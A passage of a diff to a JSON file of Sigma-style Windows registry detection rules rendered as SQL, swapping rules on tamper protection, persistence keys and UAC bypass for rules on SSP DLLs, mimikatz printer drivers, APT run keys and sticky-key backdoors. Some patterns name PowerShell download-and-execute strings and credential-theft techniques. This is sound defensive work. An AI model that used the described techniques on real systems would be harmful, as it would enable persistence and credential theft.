Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", + "author": "iwillkeepwatch", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1547.005" ], "falsepositives": [ - "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" ], - "filename": "registry_set_sophos_av_tamper.yml" + "filename": "registry_event_ssp_added_lsa_config.yml" }, { - "title": "Registry Persitence via Service in Safe Mode", - "id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", - "status": "experimental", - "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", - "author": "frack113", + "title": "PrinterNightmare Mimimkatz Driver Name", + "id": 
"ba6b9e43-1d45-4d3c-a504-1043a64c8469", + "status": "test", + "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", + "author": "Markus Neis, @markus_neis, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.execution", + "attack.t1204", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ - "Unknown" + "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND NewValue = 'Service') AND NOT ((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE 
'%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" ], - "filename": "registry_set_add_load_service_in_safe_mode.yml" + "filename": "registry_event_mimikatz_printernightmare.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Registry", - "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "title": "New DLL Added to AppCertDlls Registry Key", + "id": "6aa1d992-5925-4e9f-a49b-845e51d1de01", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\nby causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\n", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1546.009" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND NewValue = 'Binary Data')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 
'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\' OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\'))" ], - "filename": "registry_set_uac_bypass_wmp.yml" + "filename": "registry_event_new_dll_added_to_appcertdlls_registry_key.yml" }, { - "title": "Disable Macro Runtime Scan Scope", - "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", - "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", - "status": "experimental", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CMSTP Execution Registry Event", + "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" ], - "filename": "registry_set_disable_macroruntimescanscope.yml" + "filename": "registry_event_cmstp_execution_by_registry.yml" }, { - "title": 
"Set TimeProviders DllName", - "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", - "status": "experimental", - "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", - "author": "frack113", + "title": "OilRig APT Registry Persistence", + "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", + "status": "test", + "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.003" + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (NewValue LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" ], - "filename": "registry_set_timeproviders_dllname.yml" + "filename": 
"registry_event_apt_oilrig_mar18.yml" }, { - "title": "New RUN Key Pointing to Suspicious Folder", - "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", - "status": "experimental", - "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", - "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", + "title": "New DLL Added to AppInit_DLLs Registry Key", + "id": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", + "status": "test", + "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll", + "author": "Ilyas Ochkov, oscd.community, Tim Shelton", "tags": [ "attack.persistence", - "attack.t1547.001" + "attack.t1546.010" ], "falsepositives": [ - "Software using weird folders for updates" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((NewValue LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (NewValue LIKE '\\%Public\\%\\\\%' ESCAPE '\\' OR NewValue LIKE 'wscript%' ESCAPE '\\' OR NewValue LIKE 'cscript%' ESCAPE '\\')))" + 
"SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\') OR (NewName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR NewName LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" ], - "filename": "registry_set_susp_run_key_img_folder.yml" + "filename": "registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" }, { - "title": "Change the Fax Dll", - "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", + "title": "Atbroker Registry Change", + "id": "9577edbb-851f-4243-8c91-1d5b50c1a39b", "status": "experimental", - "description": "Detect possible persistence using Fax DLL load when service restart", - "author": "frack113", + "description": "Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'", + "author": "Mateusz Wydra, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1218", + "attack.persistence", + "attack.t1547" ], "falsepositives": [ - "Unknown" + "Creation of non-default, legitimate at usage" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImageName%' ESCAPE '\\') AND NOT (NewValue LIKE '\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' 
AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\' OR TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\atbroker.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\' AND NewValue = '(Empty)') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\')))" ], - "filename": "registry_set_fax_dll_persistance.yml" + "filename": "registry_event_susp_atbroker_change.yml" }, { - "title": "Change Winevt Event Access Permission Via Registry", - "id": "7d9263bd-dc47-4a58-bc92-5474abab390c", - "status": "experimental", - "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", - "author": "frack113", + "title": "WINEKEY Registry Modification", + "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", + "status": "test", + "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", + "author": "omkar72", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ChannelAccess' ESCAPE '\\' AND (NewValue LIKE '%(A;;0x1;;;SY)%' ESCAPE '\\' OR 
NewValue LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR NewValue LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" ], - "filename": "registry_set_change_winevt_channelaccess.yml" + "filename": "registry_event_runkey_winekey.yml" }, { - "title": "Suspicious Printer Driver Empty Manufacturer", - "id": "e0813366-0407-449a-9869-a2db1119dc41", - "status": "test", - "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", - "author": "Florian Roth (Nextron Systems)", + "title": "Creation of a Local Hidden User Account by Registry", + "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", + "status": "experimental", + "description": "Sysmon registry detection of a local hidden user account.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ - "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND NewValue = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC 
Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_susp_printer_driver.yml" + "filename": "registry_event_add_local_hidden_user.yml" }, { - "title": "Suspicious Powershell In Registry Run Keys", - "id": "8d85cf08-bf97-4260-ba49-986a2a65129c", - "status": "experimental", - "description": "Detects potential PowerShell commands or code within registry run keys", - "author": "frack113, Florian Roth", + "title": "Windows Registry Trust Record Modification", + "id": "295a59c1-7b79-4b47-a930-df12c15fc9c2", + "status": "test", + "description": "Alerts on trust record modification within the registry, indicating usage of macros", + "author": "Antonlovesdnb", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Legitimate admin or third party scripts. 
Baseline according to your environment" + "Alerts on legitimate macro usage as well, will need to filter as appropriate" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND (NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%pwsh %' ESCAPE '\\' OR NewValue LIKE '%FromBase64String%' ESCAPE '\\' OR NewValue LIKE '%.DownloadFile(%' ESCAPE '\\' OR NewValue LIKE '%.DownloadString(%' ESCAPE '\\' OR NewValue LIKE '% -w hidden %' ESCAPE '\\' OR NewValue LIKE '% -w 1 %' ESCAPE '\\' OR NewValue LIKE '%-windowstyle hidden%' ESCAPE '\\' OR NewValue LIKE '%-window hidden%' ESCAPE '\\' OR NewValue LIKE '% -nop %' ESCAPE '\\' OR NewValue LIKE '% -encodedcommand %' ESCAPE '\\' OR NewValue LIKE '%-ExecutionPolicy Bypass%' ESCAPE '\\' OR NewValue LIKE '%Invoke-Expression%' ESCAPE '\\' OR NewValue LIKE '%IEX (%' ESCAPE '\\' OR NewValue LIKE '%Invoke-Command%' ESCAPE '\\' OR NewValue LIKE '%ICM -%' ESCAPE '\\' OR NewValue LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR NewValue LIKE '%IWR %' ESCAPE '\\' OR NewValue LIKE '% -noni %' ESCAPE '\\' OR NewValue LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%TrustRecords%' ESCAPE '\\')" ], - "filename": "registry_set_powershell_in_run_keys.yml" + "filename": "registry_event_trust_record_modification.yml" }, { - "title": "DNS-over-HTTPS Enabled by Registry", - "id": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", + "title": "Leviathan Registry Key Activity", + "id": "70d43542-cd2d-483c-8f30-f16b436fd7db", "status": "test", - "description": "Detects when a user enables DNS-over-HTTPS.\nThis can be used to hide internet 
activity or be used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.\n", - "author": "Austin Songer", + "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", + "author": "Aidan Bracher", "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.t1112" - ], - "falsepositives": [ - "Unlikely" + "attack.persistence", + "attack.t1547.001" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Edge\\\\BuiltInDnsClientEnabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Google\\\\Chrome\\\\DnsOverHttpsMode' ESCAPE '\\' AND NewValue = 'secure') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Mozilla\\\\Firefox\\\\DNSOverHTTPS\\\\Enabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" ], - "filename": "registry_set_dns_over_https_enabled.yml" + "filename": "registry_event_apt_leviathan.yml" }, { - "title": "ScreenSaver Registry Key Set", - "id": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", + "title": "Sticky Key Like Backdoor Usage - Registry", + "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", "status": "experimental", - "description": "Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl", - "author": "Jose Luis Sanchez Martinez 
(@Joseliyo_Jstnk)", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ - "Legitimate use of screen saver" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE%' ESCAPE '\\' AND NewValue LIKE '%.scr' ESCAPE '\\') AND NOT ((NewValue LIKE '%C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' 
ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" ], - "filename": "registry_set_scr_file_executed_by_rundll32.yml" + "filename": "registry_event_stickykey_like_backdoor.yml" }, { - "title": "Registry Disable System Restore", - "id": "5de03871-5d46-4539-a82d-3aa992a69a83", - "status": "experimental", - "description": "Detects the modification of the registry to disable a system restore on the computer", - "author": "frack113", + "title": "Suspicious Camera and Microphone Access", + "id": "62120148-6b7a-42be-8b91-271c04e281a3", + "status": "test", + "description": "Detects Processes accessing the camera and microphone from suspicious folder", + "author": "Den Iuzvyk", "tags": [ - "attack.impact", - "attack.t1490" + "attack.collection", + "attack.t1125", + "attack.t1123" ], "falsepositives": [ - "Unknown" + "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE '%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry 
value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE '%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE '%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Desktop#%' ESCAPE '\\'))" ], - "filename": "registry_set_disable_system_restore.yml" + "filename": "registry_event_susp_mic_cam_access.yml" }, { - "title": "Add Port Monitor Persistence in Registry", - "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", - "status": "experimental", - "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", - "author": "frack113", + "title": "RedMimicry Winnti Playbook Registry Manipulation", + "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", + "status": "test", + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ - "attack.persistence", - "attack.t1547.010" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE 